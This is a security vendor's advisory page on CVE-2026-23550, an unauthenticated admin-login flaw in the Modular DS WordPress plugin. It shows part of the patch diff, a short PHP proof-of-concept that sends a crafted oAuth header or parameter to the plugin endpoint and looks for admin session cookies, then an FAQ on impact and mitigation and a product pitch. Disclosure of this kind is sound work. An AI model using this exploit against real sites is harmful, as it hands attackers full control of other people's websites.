     $GLOBALS['__composer_autoload_files'] = array_merge(
         $existingComposerAutoloadFiles,
-        array_fill_keys(['db9b6aa0d4216bbe4bdd6a868a1c3c1d', '9eaa6b0f3f04e58e17ae5ecb754ea313', '295741e4046be8b88eb525c43c49c565', 'acbe0d033c55cd0a032b415e08d14f4c', 'e7cce8c90104d8023b8e1924fe68dd45', 'b48cbeb76a71e226a23fa64ac2b94dc6', '0bb35f30d3329b99bbba5562b870bd30', '36dfd6ed9dd74e8062aa61f09caf8554', '79edd977ef0c925a03e16b7120ad9fa1', '5928a00fa978807cf85d90ec3f4b0147', '52cfe9aa590fcc0c1694a7082506e776', '5a7bb63098496af4e240e58eddca59a9', '93335753ca3dd3d62447d763cb9e59fd', 'b178954ba4692b8876c08a4a97e6ce23', '28099935d0ea91a1b5e09408e356eacb', 'c5e5dfa7f2077b89dbc43523332b50aa', '674e404d8857dd99db32bc218bb5643a', '83cc8b953df9a6f7e51f674d84d57730', '9250916e8af80e0d1bb31401fd2e15a7', '99b27172349c9ec3abea78f62e2938bb', 'a875add15ea9a7df1a6c0c26cc9e4590', '1cbb53d50065225a14c2360be2ccbf6f', '54b9ab13bc86d8251a04a939888e357e', 'a89966141ddd51b9b7e868bc3b2f9bb0', '7bdb062931f6e7102434c3ad28423eb6', 'f49032536fdd06afd9df7191c3f21453', '18e965175c6bcd96deba6bc791a44373', '51421aa3e5e8003b70a289762d146a2a', '7edcabe1b67fbb38f4972a722bbbb429', '7b0b5d7b98f96ad751222ae5cc98cfcb', 'd1fb64fd99fc22e28e29a95cc0ea533a'], true)
+        array_fill_keys(['d7477911cd049bbd22fc06886adcd76a', '9eaa6b0f3f04e58e17ae5ecb754ea313', '96e6be4dee482c433db35007e272ccb1', 'acbe0d033c55cd0a032b415e08d14f4c', '6595570c01f6b61275f965dd5f61dc9e', 'b48cbeb76a71e226a23fa64ac2b94dc6', 'be46ff9416c6039edf2c9e9d0f073bc7', '36dfd6ed9dd74e8062aa61f09caf8554', '57776b6b937d151aa09700e58bc43ff7', '5928a00fa978807cf85d90ec3f4b0147', 'da3333cb928bd72afb37c8655e4b0dc4', '3be3930930d4833e9170bb96a98017ed', '5b10ea17a66c57c2dec9163991a14bfe', 'b178954ba4692b8876c08a4a97e6ce23', '28099935d0ea91a1b5e09408e356eacb', 'c5e5dfa7f2077b89dbc43523332b50aa', '674e404d8857dd99db32bc218bb5643a', '83cc8b953df9a6f7e51f674d84d57730', '9250916e8af80e0d1bb31401fd2e15a7', '99b27172349c9ec3abea78f62e2938bb', 'a875add15ea9a7df1a6c0c26cc9e4590', '1cbb53d50065225a14c2360be2ccbf6f', '54b9ab13bc86d8251a04a939888e357e', 'a89966141ddd51b9b7e868bc3b2f9bb0', '7bdb062931f6e7102434c3ad28423eb6', 'f49032536fdd06afd9df7191c3f21453', '18e965175c6bcd96deba6bc791a44373', '51421aa3e5e8003b70a289762d146a2a', '7edcabe1b67fbb38f4972a722bbbb429', '7b0b5d7b98f96ad751222ae5cc98cfcb', 'd1fb64fd99fc22e28e29a95cc0ea533a'], true)
     );

     return $loader;
--- a/modular-connector/vendor/vlucas/phpdotenv/src/Parser/EntryParser.php
+++ b/modular-connector/vendor/vlucas/phpdotenv/src/Parser/EntryParser.php
@@ -149,7 +149,6 @@
                 });
             });
         }, Success::create([Value::blank(), self::INITIAL_STATE]))->flatMap(static function (array $result) {
-            /** @psalm-suppress DocblockTypeContradiction */
             if (in_array($result[1], self::REJECT_STATES, true)) {
                 /** @var GrahamCampbellResultTypeResult<DotenvParserValue, string> */
                 return Error::create('a missing closing quote');
--- a/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/EnvConstAdapter.php
+++ b/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/EnvConstAdapter.php
@@ -45,7 +45,6 @@
             if ($value === true) {
                 return 'true';
             }
-            /** @psalm-suppress PossiblyInvalidCast */
             return (string) $value;
         });
     }
--- a/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/ServerConstAdapter.php
+++ b/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/ServerConstAdapter.php
@@ -45,7 +45,6 @@
             if ($value === true) {
                 return 'true';
             }
-            /** @psalm-suppress PossiblyInvalidCast */
             return (string) $value;
         });
     }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-23550 - Modular DS <= 2.5.1 - Unauthenticated Privilege Escalation

<?php

$target_url = 'http://vulnerable-site.com/wp-content/plugins/modular-connector/public/index.php';

// Craft the exploit request targeting the broken oAuth endpoint.
// The 'type' parameter must be set to 'oauth' to trigger the vulnerable path.
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Set the required header to indicate an oAuth request.
$headers = [
    'x-mo-type: oauth'
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

// Alternatively, the type can be passed as a GET parameter.
// Uncomment the next line and comment the headers above to test the GET parameter method.
// curl_setopt($ch, CURLOPT_URL, $target_url . '?type=oauth');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    // Check the response for indicators of successful authentication.
    // A successful exploit may redirect to the WordPress admin dashboard or return session cookies.
    if ($http_code == 200 || $http_code == 302) {
        echo "Potential exploitation successful. Check response for admin session cookies or redirects.n";
        echo "Response length: " . strlen($response) . " bytesn";
        // Output headers to inspect for Set-Cookie.
        $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
        $response_headers = substr($response, 0, $header_size);
        echo "Response Headers:n$response_headersn";
    } else {
        echo "Exploitation may have failed or endpoint not vulnerable.n";
    }
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-23550?
Understanding the vulnerability
CVE-2026-23550 is a critical vulnerability in the Modular DS plugin for WordPress, affecting versions up to and including 2.5.1. It allows unauthenticated attackers to escalate privileges and log in as an administrator due to a broken oAuth implementation.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exploits a logic flaw in the plugin’s routing system, specifically in the bindOldRoutes method. Attackers can send crafted HTTP requests to the oAuth endpoint, bypassing authentication and gaining administrative access.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Modular DS plugin version 2.5.1 or earlier is at risk. Administrators should check their installed plugin version to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Modular DS plugin installed. If it is version 2.5.1 or earlier, your site is susceptible to this vulnerability.
What is the recommended fix for this vulnerability?
Mitigation steps
The recommended fix is to update the Modular DS plugin to version 2.5.2 or later, which includes a patch that resolves the broken oAuth implementation and enhances security.
What if I cannot immediately update the plugin?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the Modular DS plugin until it can be updated. This will prevent potential exploitation while you arrange for the update.
What does a CVSS score of 9.8 indicate?
Understanding risk levels
A CVSS score of 9.8 indicates a critical severity level, meaning that the vulnerability can be exploited remotely without authentication. This poses a significant risk to the integrity and security of the affected WordPress site.
What are the practical risks of this vulnerability?
Potential impacts on your site
Successful exploitation allows attackers to gain full administrative control over the WordPress site. This can lead to unauthorized changes, data theft, or the installation of malicious software.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept provides a script that sends a specially crafted HTTP request to the vulnerable oAuth endpoint, demonstrating how an attacker can exploit the vulnerability to gain administrative access without authentication.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect your site has been compromised, immediately change all administrative passwords, review user accounts for unauthorized access, and consider restoring from a clean backup. Conduct a thorough security audit to identify any further issues.
Where can I find updates about this vulnerability?
Staying informed
Updates regarding CVE-2026-23550 and related vulnerabilities can be found on the official CVE database, security advisories from WordPress, and the plugin’s official website.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations